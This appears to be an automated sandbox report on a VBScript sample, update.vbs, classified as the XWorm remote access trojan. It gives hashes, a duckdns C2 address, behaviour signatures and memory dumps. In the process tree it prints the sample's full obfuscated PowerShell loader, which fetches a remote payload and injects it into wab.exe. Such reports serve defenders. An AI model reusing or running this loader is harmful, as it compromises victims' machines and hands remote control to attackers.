Overview

overview

10

Static

static

1

update.vbs

windows7-x64

8

update.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 16:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    update.vbs

  • Size

    896KB

  • MD5

    5166cecef029d7b9392a1bc345639747

  • SHA1

    abed1e58d8b9633ccab51ddd5c18994cc8183bc8

  • SHA256

    b7e3ed8add4ed1f4d78dd45fd97486240585c79ebb5f636949d0e2e62f3b6e14

  • SHA512

    a07a6c9978f1c0f143413073440763d8f144aa645568b7a82811d398fa089427135238beca0a6d410ce11720c4b12bd594284644a5a7b44c0601ef5a2a5b1488

  • SSDEEP

    12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9dU:UXh+k+taGKqoJOdU

Score
10/10
xwormrattrojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

xgmn934.duckdns.org:8896

Mutex

2utLZrxcByvppTdF

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\update.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Flaccid = 1;$Santalales='Sub';$Santalales+='strin';$Santalales+='g';Function Semiflexion($Telefoniens){$Vespertine=$Telefoniens.Length-$Flaccid;For($fosterer=5;$fosterer -lt $Vespertine;$fosterer+=6){$Smudslitteraturs+=$Telefoniens.$Santalales.Invoke( $fosterer, $Flaccid);}$Smudslitteraturs;}function Underlydsflyets($Lao){. ($Licentiatgradernes) ($Lao);}$Vastities=Semiflexion ' ,imbMDertioPre dzBolvribuybalLimo,lUnvapaPhilo/Nonso5Smals.Forld0ga.lt Forfr( Fo.kW BrddiTyskfnVaccidakkvio.fskewAf,lasHy.ek AfbrkNSemirTFusco t,nde1 Tj,n0Rets .Nevad0Triss;progr EndazWCensoiSpgern Fe r6Uterl4Ut ke; Bevi UnsplxSlave6Ov.re4Pinol;Overr Acenr Ul.rvArbit:Unrot1R.tsf2uhr,i1K,der.Ag.ra0Colpo)Alk l DyrskGTvan eProffcMiscokLykkeo Dagl/ Gran2F,dno0 Skri1 Fals0Mohi 0ansg,1 kl.r0Nyans1Cuta, roed FP,rapi SperrSyst,e aphafStriboOv rax Haze/Nehil1 Cist2 Fors1Polit.Motio0Outea ';$Blenders=Semiflexion 'FredsUOt.cosPresee orrdrGerma-navleAUproogP,sole SammnLeylatIm,re ';$Fjernsyn=Semiflexion 'Mandsh Apprt UdkotSkrifp rgotsForsg: Prec/Virk,/Seam,wTsuchw ByrawSuper.Ebulls Se.ieUnretnBudcedRamadsNondep U.tiaGarvecF,ikaeObtru.Starcc erejo OvermNonpr/gl,ciphydr.rGarceo Stut/Ti.dedKoncelElekt/Opsti3 Tv,faTrim.9ArealxSavlejPtery1 G.ng ';$blokbogstaverne=Semiflexion 'Geocr>Dr,je ';$Licentiatgradernes=Semiflexion 'Pilimi .artem,llixSic l ';$Unsmiled='Opslagsvrkerne';$Besodden = Semiflexion 'Afskye AlogcInelih latioIne p Betin%Olmfua Gud,pnonc,pIn bid Litoa Prott FletaIndsk%Ximen\ olymGEtvrea SubtlAnklagExposeScrapn Cont1Gia t6Forud5Sland. ,ornKRealin forei .ell K,ops&Ganoc& Spaq JerikeAut,mcTungehLaantoDeesk Ars.t H ml ';Underlydsflyets (Semiflexion ',isse$blomkgMaanel Ur.doMedarbOverlaMu tilAzobe:LanarD Prinu Aueta Venil,ishaaWinge=Elli,(C.rboc GamomLowrad eocl Ele t/ PickcKotwa Udsmi$.ruppBmaaleeClavisAalano oveddBetakd Acr.eMinern Svin)Provo ');Underlydsflyets (Semiflexion ' Upgr$T ivlgLi,ocl Plato tribbBesina No.slMarsk:Non.lMCompueentertHjernaSide.dInferoUnco,n Pla.b Unmoe T,reh Udhua TeasnAutoxdMagislSamoriTriconAlf,dg,eran= Gaze$AlkalFMagnejDigtnePolakrGenern DepusKhu kyNedlanI,bre.Subdasa.aphpNonprlsammeiv nhet,olig(Pr in$Hom,db DommlAntihoHom bkValgdb MaltoAethegProlisSli gttumoraY,cksv Ud pestorkr FarvnTrileeFin,v)Wrest ');$Fjernsyn=$Metadonbehandling[0];$Toiletspejles= (Semiflexion 'Tooth$ Skoeg Retsl Mesooha bnb AalhaPrustl roug:Elefat G.iqiStenbtNatiorKrysge QuilrFor.aasirplnR visnRevolaJeesmlA.tenyTrffes Zoope.hapsrOverp=Lans,N Kri.eLitt.wHvoro-ByggeOTouribInterj Ha,sePapirc f,gotoscar Pan,SProfayAftrdssuti,tUnjaueSammem Aron.Ret aNBleedeRentetB gca.IgangWLidiseBish bImplaCOpti lEndosiReclae Taxin De,at');$Toiletspejles+=$Duala[1];Underlydsflyets ($Toiletspejles);Underlydsflyets (Semiflexion ' arag$Befstt dommiS,ciatSmederStopheDisvorDownlaVo.epnTrekanRigoraInterlEn ety Diffs Un eeSl.vir N,il.ParalHSalpieselekaMod.rdAconieForrarRyttes Lykk[Genet$Deo.yBHyraxlFr.nte Silvnb edydOmkl e Brokr.ngansKoola]Ex.um=Guddo$UdskrV Ch eaInexpsPolyst.enotiIndf t ClitiIn.oge DescsRattl ');$Amatrarkologers=Semiflexion ' Un,a$LyknstSkewni vel.tTeachr,ramme,ibekrCher,aHolomn Palan,nsupaTriollUn,enySome sUltraemalnorU,mov.Unde,DSlappoSkor.wRamusnHea slKakemoDep ca ,arad RegnFIndfriImpetlRdg.neEf,er(Skalp$GilbeF Lderj MarteCarairOpr.gnMultisCharmyRadionStruk,Gudhe$ F,itEPrusspHetera.nsecl Lan.pRejseaLgneht Aksge.alav)myofi ';$Epalpate=$Duala[0];Underlydsflyets (Semiflexion 'Karto$,ncepgKa.iulHvileoafkorbAq,edaBeautl hori:VirkeDS apeiEnstav PassiGlatinCivilaPrecob,ageslSchmee.ilic= Radi(pythoThirdse Komps GangtIld,l- OzonPSchisaRaasttJubilhOutec kinn$ SkrlEIn.erpTaxwiaPersol C.enpFrontaMisprtDisbeeJunke)Sem t ');while (!$Divinable) {Underlydsflyets (Semiflexion '.atri$SubergTurnslSpalto KonfbOpistaUnderlDisob:WooleOWhacksRingdt.endee Irren TaagsbisinoProparSvejfiGudetaDkvi.=Engra$ LytttLipidr GraduGum,tePalad ') ;Underlydsflyets $Amatrarkologers;Underlydsflyets (Semiflexion 'UdvlgSB viltcheesaKooter iott.hidd-Kon iS tch.lUnreveTr,eneGironpUninf Tross4Lvovp ');Underlydsflyets (Semiflexion ' Bnds$ParapgFejeklRdha.oCanepbisobaaVerdelChefk: ref,DGangbiExcerv alibi She.n Salma.halebdeadwl ImmaeUnsu,= Bes (RotalT,inameBegaasTrykltRealt-PickePNooklaPrototVaccih .xer Costa$ .alvEC.ntepBas.sa UdgilUncyppKilogaSkattt Downe Unma) Rot, ') ;Underlydsflyets (Semiflexion ',ilsk$R.ntgg Sco.lMundioBenhibN.vlea WurzlRinge: sub.NAllieoUndignB stugHus reYannonAtomfe Chuca PauslForgyoBjrgngRhigoiHep.acEugenaO,fenl Vaar=cyt,t$Rea,tgSaloolAgg eo ncilbPyrogaTitallNajes: DiftL onkrnHeinrgHaan s Sta,eOutsplOntogsIgangfCystouHenfalSangedMandueMilte+Relly+Unmis%S,raf$WickeMSt,deeLowlytMacroaTele,dSi skoShoven Bobeb.runheLevenh.mblya eptnIn uld Al hlRavjyiTrustnRecepgUnpar.HerlicMaitroculliuRacemn GenetRes,n ') ;$Fjernsyn=$Metadonbehandling[$Nongenealogical];}$Groenlandske11=324564;$Kapellaners=29919;Underlydsflyets (Semiflexion 'monro$jarfug An,ilQuizzoHygg b Hov,aIn.rtlNatte:PerceVtel voMe,lomAdvano Whits Refur stud jeppe=Chemi R.cisGSardieBefu.t Dvrg-SkelsCG hngolgesrnAfbart,achye AnstnSlagnt .ras Theo$ omeE StvnpC.ntraLrksgl DefepStiftaArchatAfslaeTuber ');Underlydsflyets (Semiflexion ' Bopl$ddsrigdiaphlCurteo SkaabMotoga.allol,fnde:RecreTDesinePudent atabrMalloahusn,pPottey PelsrO,svbetvan n SjokoOpbe,uRaadgsJumpe msla=Alipi Uddi[poll,SFarfaySynkrs.iloptDestaeNonremDds.t.genneC brawohelminSultev Pn.ue Diffr.orget Tu t]Super:Deve :UltimFSmergrmas.lo Overm K.nnBTrakwaPlan,sTran.epuc,l6H.bac4He.arSInvestVebogrIncori Ild.nCognagLakf.( upma$,etorVUgl,ro be,umBeb.goVortisCatchr nong)Fris, ');Underlydsflyets (Semiflexion 'Ps.ud$EbeltgNetadlSu,laoZygotbKo staCom,elM,rta: .onaLUdmateUndipp W,ofiD beldSpecioFiv,rlHeldaiRdarvt Jvi.eYelp for,l=Withs Welco[Ko diS,tormy Misas,ubbitTjreneT leomParli.SekonTPe,mueFotokxSecultFilms.SkokrE Reinn Pr,acunseaon maudSvmmeiColoqnHarpug Pala],oral:Sunna:He koARefunSKanapCAmbi,ITilsmIOb,en.TraguGsub oeAktivtFun aSDiamatN.ncorIll,siMaikanBarbzgTripe(Unsub$RespaTSo keeMultit.uperrUngenaRtesup ordeyUdsp rRe uce GloonEl,eno .akeu,fbudsKram )Gen,e ');Underlydsflyets (Semiflexion ' Tech$succog yperltautooDistibF.evaaSprudlPillm: AleeSDi,kmaBro hmEnc,mtSttysa Cou.l Bek e g skdNesose un,r=,thal$Fj rnLNuanceMonotp Tilhi PuhsdmedleoBanedl ProgiMarketHa,vle Afbl.KoketsGlocku pseubHobblsUnge,tBl.zorFarmhispi,nnCar igInter(Defle$praliG UkrurinforoDeckheIrvinn Aphtl Re iaPollonMa trdCap.cs OutvkDoloueShrin1C.vil1Tinkt,Dynev$Dor,mKPhonoa EthipHa,sleS,ydelOverclStrata AsthnNiveae ldrer Drais teno)Skrd. ');Underlydsflyets $Samtalede;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:940
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Galgen165.Kni && echo t"
        3⤵
          PID:3016
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Flaccid = 1;$Santalales='Sub';$Santalales+='strin';$Santalales+='g';Function Semiflexion($Telefoniens){$Vespertine=$Telefoniens.Length-$Flaccid;For($fosterer=5;$fosterer -lt $Vespertine;$fosterer+=6){$Smudslitteraturs+=$Telefoniens.$Santalales.Invoke( $fosterer, $Flaccid);}$Smudslitteraturs;}function Underlydsflyets($Lao){. ($Licentiatgradernes) ($Lao);}$Vastities=Semiflexion ' ,imbMDertioPre dzBolvribuybalLimo,lUnvapaPhilo/Nonso5Smals.Forld0ga.lt Forfr( Fo.kW BrddiTyskfnVaccidakkvio.fskewAf,lasHy.ek AfbrkNSemirTFusco t,nde1 Tj,n0Rets .Nevad0Triss;progr EndazWCensoiSpgern Fe r6Uterl4Ut ke; Bevi UnsplxSlave6Ov.re4Pinol;Overr Acenr Ul.rvArbit:Unrot1R.tsf2uhr,i1K,der.Ag.ra0Colpo)Alk l DyrskGTvan eProffcMiscokLykkeo Dagl/ Gran2F,dno0 Skri1 Fals0Mohi 0ansg,1 kl.r0Nyans1Cuta, roed FP,rapi SperrSyst,e aphafStriboOv rax Haze/Nehil1 Cist2 Fors1Polit.Motio0Outea ';$Blenders=Semiflexion 'FredsUOt.cosPresee orrdrGerma-navleAUproogP,sole SammnLeylatIm,re ';$Fjernsyn=Semiflexion 'Mandsh Apprt UdkotSkrifp rgotsForsg: Prec/Virk,/Seam,wTsuchw ByrawSuper.Ebulls Se.ieUnretnBudcedRamadsNondep U.tiaGarvecF,ikaeObtru.Starcc erejo OvermNonpr/gl,ciphydr.rGarceo Stut/Ti.dedKoncelElekt/Opsti3 Tv,faTrim.9ArealxSavlejPtery1 G.ng ';$blokbogstaverne=Semiflexion 'Geocr>Dr,je ';$Licentiatgradernes=Semiflexion 'Pilimi .artem,llixSic l ';$Unsmiled='Opslagsvrkerne';$Besodden = Semiflexion 'Afskye AlogcInelih latioIne p Betin%Olmfua Gud,pnonc,pIn bid Litoa Prott FletaIndsk%Ximen\ olymGEtvrea SubtlAnklagExposeScrapn Cont1Gia t6Forud5Sland. ,ornKRealin forei .ell K,ops&Ganoc& Spaq JerikeAut,mcTungehLaantoDeesk Ars.t H ml ';Underlydsflyets (Semiflexion ',isse$blomkgMaanel Ur.doMedarbOverlaMu tilAzobe:LanarD Prinu Aueta Venil,ishaaWinge=Elli,(C.rboc GamomLowrad eocl Ele t/ PickcKotwa Udsmi$.ruppBmaaleeClavisAalano oveddBetakd Acr.eMinern Svin)Provo ');Underlydsflyets (Semiflexion ' Upgr$T ivlgLi,ocl Plato tribbBesina No.slMarsk:Non.lMCompueentertHjernaSide.dInferoUnco,n Pla.b Unmoe T,reh Udhua TeasnAutoxdMagislSamoriTriconAlf,dg,eran= Gaze$AlkalFMagnejDigtnePolakrGenern DepusKhu kyNedlanI,bre.Subdasa.aphpNonprlsammeiv nhet,olig(Pr in$Hom,db DommlAntihoHom bkValgdb MaltoAethegProlisSli gttumoraY,cksv Ud pestorkr FarvnTrileeFin,v)Wrest ');$Fjernsyn=$Metadonbehandling[0];$Toiletspejles= (Semiflexion 'Tooth$ Skoeg Retsl Mesooha bnb AalhaPrustl roug:Elefat G.iqiStenbtNatiorKrysge QuilrFor.aasirplnR visnRevolaJeesmlA.tenyTrffes Zoope.hapsrOverp=Lans,N Kri.eLitt.wHvoro-ByggeOTouribInterj Ha,sePapirc f,gotoscar Pan,SProfayAftrdssuti,tUnjaueSammem Aron.Ret aNBleedeRentetB gca.IgangWLidiseBish bImplaCOpti lEndosiReclae Taxin De,at');$Toiletspejles+=$Duala[1];Underlydsflyets ($Toiletspejles);Underlydsflyets (Semiflexion ' arag$Befstt dommiS,ciatSmederStopheDisvorDownlaVo.epnTrekanRigoraInterlEn ety Diffs Un eeSl.vir N,il.ParalHSalpieselekaMod.rdAconieForrarRyttes Lykk[Genet$Deo.yBHyraxlFr.nte Silvnb edydOmkl e Brokr.ngansKoola]Ex.um=Guddo$UdskrV Ch eaInexpsPolyst.enotiIndf t ClitiIn.oge DescsRattl ');$Amatrarkologers=Semiflexion ' Un,a$LyknstSkewni vel.tTeachr,ramme,ibekrCher,aHolomn Palan,nsupaTriollUn,enySome sUltraemalnorU,mov.Unde,DSlappoSkor.wRamusnHea slKakemoDep ca ,arad RegnFIndfriImpetlRdg.neEf,er(Skalp$GilbeF Lderj MarteCarairOpr.gnMultisCharmyRadionStruk,Gudhe$ F,itEPrusspHetera.nsecl Lan.pRejseaLgneht Aksge.alav)myofi ';$Epalpate=$Duala[0];Underlydsflyets (Semiflexion 'Karto$,ncepgKa.iulHvileoafkorbAq,edaBeautl hori:VirkeDS apeiEnstav PassiGlatinCivilaPrecob,ageslSchmee.ilic= Radi(pythoThirdse Komps GangtIld,l- OzonPSchisaRaasttJubilhOutec kinn$ SkrlEIn.erpTaxwiaPersol C.enpFrontaMisprtDisbeeJunke)Sem t ');while (!$Divinable) {Underlydsflyets (Semiflexion '.atri$SubergTurnslSpalto KonfbOpistaUnderlDisob:WooleOWhacksRingdt.endee Irren TaagsbisinoProparSvejfiGudetaDkvi.=Engra$ LytttLipidr GraduGum,tePalad ') ;Underlydsflyets $Amatrarkologers;Underlydsflyets (Semiflexion 'UdvlgSB viltcheesaKooter iott.hidd-Kon iS tch.lUnreveTr,eneGironpUninf Tross4Lvovp ');Underlydsflyets (Semiflexion ' Bnds$ParapgFejeklRdha.oCanepbisobaaVerdelChefk: ref,DGangbiExcerv alibi She.n Salma.halebdeadwl ImmaeUnsu,= Bes (RotalT,inameBegaasTrykltRealt-PickePNooklaPrototVaccih .xer Costa$ .alvEC.ntepBas.sa UdgilUncyppKilogaSkattt Downe Unma) Rot, ') ;Underlydsflyets (Semiflexion ',ilsk$R.ntgg Sco.lMundioBenhibN.vlea WurzlRinge: sub.NAllieoUndignB stugHus reYannonAtomfe Chuca PauslForgyoBjrgngRhigoiHep.acEugenaO,fenl Vaar=cyt,t$Rea,tgSaloolAgg eo ncilbPyrogaTitallNajes: DiftL onkrnHeinrgHaan s Sta,eOutsplOntogsIgangfCystouHenfalSangedMandueMilte+Relly+Unmis%S,raf$WickeMSt,deeLowlytMacroaTele,dSi skoShoven Bobeb.runheLevenh.mblya eptnIn uld Al hlRavjyiTrustnRecepgUnpar.HerlicMaitroculliuRacemn GenetRes,n ') ;$Fjernsyn=$Metadonbehandling[$Nongenealogical];}$Groenlandske11=324564;$Kapellaners=29919;Underlydsflyets (Semiflexion 'monro$jarfug An,ilQuizzoHygg b Hov,aIn.rtlNatte:PerceVtel voMe,lomAdvano Whits Refur stud jeppe=Chemi R.cisGSardieBefu.t Dvrg-SkelsCG hngolgesrnAfbart,achye AnstnSlagnt .ras Theo$ omeE StvnpC.ntraLrksgl DefepStiftaArchatAfslaeTuber ');Underlydsflyets (Semiflexion ' Bopl$ddsrigdiaphlCurteo SkaabMotoga.allol,fnde:RecreTDesinePudent atabrMalloahusn,pPottey PelsrO,svbetvan n SjokoOpbe,uRaadgsJumpe msla=Alipi Uddi[poll,SFarfaySynkrs.iloptDestaeNonremDds.t.genneC brawohelminSultev Pn.ue Diffr.orget Tu t]Super:Deve :UltimFSmergrmas.lo Overm K.nnBTrakwaPlan,sTran.epuc,l6H.bac4He.arSInvestVebogrIncori Ild.nCognagLakf.( upma$,etorVUgl,ro be,umBeb.goVortisCatchr nong)Fris, ');Underlydsflyets (Semiflexion 'Ps.ud$EbeltgNetadlSu,laoZygotbKo staCom,elM,rta: .onaLUdmateUndipp W,ofiD beldSpecioFiv,rlHeldaiRdarvt Jvi.eYelp for,l=Withs Welco[Ko diS,tormy Misas,ubbitTjreneT leomParli.SekonTPe,mueFotokxSecultFilms.SkokrE Reinn Pr,acunseaon maudSvmmeiColoqnHarpug Pala],oral:Sunna:He koARefunSKanapCAmbi,ITilsmIOb,en.TraguGsub oeAktivtFun aSDiamatN.ncorIll,siMaikanBarbzgTripe(Unsub$RespaTSo keeMultit.uperrUngenaRtesup ordeyUdsp rRe uce GloonEl,eno .akeu,fbudsKram )Gen,e ');Underlydsflyets (Semiflexion ' Tech$succog yperltautooDistibF.evaaSprudlPillm: AleeSDi,kmaBro hmEnc,mtSttysa Cou.l Bek e g skdNesose un,r=,thal$Fj rnLNuanceMonotp Tilhi PuhsdmedleoBanedl ProgiMarketHa,vle Afbl.KoketsGlocku pseubHobblsUnge,tBl.zorFarmhispi,nnCar igInter(Defle$praliG UkrurinforoDeckheIrvinn Aphtl Re iaPollonMa trdCap.cs OutvkDoloueShrin1C.vil1Tinkt,Dynev$Dor,mKPhonoa EthipHa,sleS,ydelOverclStrata AsthnNiveae ldrer Drais teno)Skrd. ');Underlydsflyets $Samtalede;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3756
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Galgen165.Kni && echo t"
            4⤵
              PID:4204
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:436

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jwtmlydq.esw.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Galgen165.Kni
        Filesize

        461KB

        MD5

        e79b05a84404e4211ead4b26ce7b4817

        SHA1

        f863917c2638ee1f6764346e1d44c7b4bf093e7e

        SHA256

        0cc9ec208c0bc0870bc99bc36f5130b3c31228438ef9df91f88b26008d56c1ff

        SHA512

        c9d1d5b2c546fc5285a59aab759ec70050ecb58fedb94dd494c9eae3384f6e53eb495608a961ce8f79f74c10d35fe9e5dad5ca35e16ae4764fc18f797df955a3

        Download Submit
      • memory/436-67-0x0000000022E30000-0x0000000022ECC000-memory.dmp
        Filesize

        624KB

        Download
      • memory/436-73-0x00000000230C0000-0x00000000230CA000-memory.dmp
        Filesize

        40KB

        Download
      • memory/436-72-0x0000000023160000-0x00000000231F2000-memory.dmp
        Filesize

        584KB

        Download
      • memory/436-66-0x0000000000E00000-0x0000000000E0E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/436-65-0x0000000000E00000-0x0000000002054000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/940-11-0x00007FFDB51B0000-0x00007FFDB5C71000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/940-12-0x00007FFDB51B0000-0x00007FFDB5C71000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/940-0-0x00007FFDB51B3000-0x00007FFDB51B5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/940-70-0x00007FFDB51B0000-0x00007FFDB5C71000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/940-10-0x0000013DDD670000-0x0000013DDD692000-memory.dmp
        Filesize

        136KB

        Download
      • memory/940-48-0x00007FFDB51B0000-0x00007FFDB5C71000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/940-47-0x00007FFDB51B3000-0x00007FFDB51B5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/940-44-0x0000013DDD350000-0x0000013DDD56C000-memory.dmp
        Filesize

        2.1MB

        Download
      • memory/3756-23-0x0000000005B00000-0x0000000005B22000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3756-41-0x0000000007BC0000-0x0000000007BE2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3756-42-0x0000000008980000-0x0000000008F24000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/3756-40-0x0000000007C80000-0x0000000007D16000-memory.dmp
        Filesize

        600KB

        Download
      • memory/3756-39-0x0000000006F00000-0x0000000006F1A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/3756-45-0x0000000008F30000-0x000000000BD5C000-memory.dmp
        Filesize

        46.2MB

        Download
      • memory/3756-38-0x0000000008300000-0x000000000897A000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/3756-37-0x00000000069B0000-0x00000000069FC000-memory.dmp
        Filesize

        304KB

        Download
      • memory/3756-36-0x0000000006970000-0x000000000698E000-memory.dmp
        Filesize

        120KB

        Download
      • memory/3756-35-0x00000000063E0000-0x0000000006734000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/3756-25-0x0000000006370000-0x00000000063D6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3756-24-0x0000000005CA0000-0x0000000005D06000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3756-22-0x0000000005D40000-0x0000000006368000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/3756-21-0x0000000003040000-0x0000000003076000-memory.dmp
        Filesize

        216KB

        Download